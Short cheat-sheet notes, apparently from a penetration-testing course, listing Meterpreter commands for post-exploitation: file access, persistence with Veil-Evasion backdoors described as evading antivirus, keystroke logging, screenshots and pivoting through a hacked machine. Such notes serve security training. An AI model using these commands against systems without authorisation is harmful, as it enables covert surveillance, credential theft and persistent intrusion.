Post Exploitation

Meterpreter Basics

  • help - shows help

  • background - backgrounds current session

  • sessions -l - list all sessions

  • sessions -i - interact with a certain session

  • sysinfo - display system info

  • ipconfig - displays information about interfaces

  • getuid - shows current user

File System Commands

  • pwd - shows current working directory

  • ls - list files in current working directory

  • cd [location] - changes working directory

  • cat [file] - prints the content of file on screen

  • download [file] - downloads file

  • upload [file] - uploads file

  • execute -f [file] - executes file

Maintaining Access

  • Using veil-evasion

    • rev_http_service

    • rev_tcp_service

    • Use it instead of a normal backdoor

    • Or upload and execute from meterpreter

    • Does not always work

  • Using persistence module

    • run persistence -h

    • Detectable by antivirus programs

  • Using metasploit + veil-evasion = more robust + undetectable by antivirus

    • use exploit/windows/local/persistence

    • set session [session id]

    • set exe::custom [backdoor location]

    • exploit

Key Logging

  • Log all mouse/keyboard events

    • keyscan_start - starts capturing keystrokes

    • keyscan_dump - dumps the keystrokes captured so far

    • keyscan_stop - stops capturing keystrokes

    • screenshot

Pivoting

  • Use the hacked device as a pivot

  • Try to gain access to other devices in the network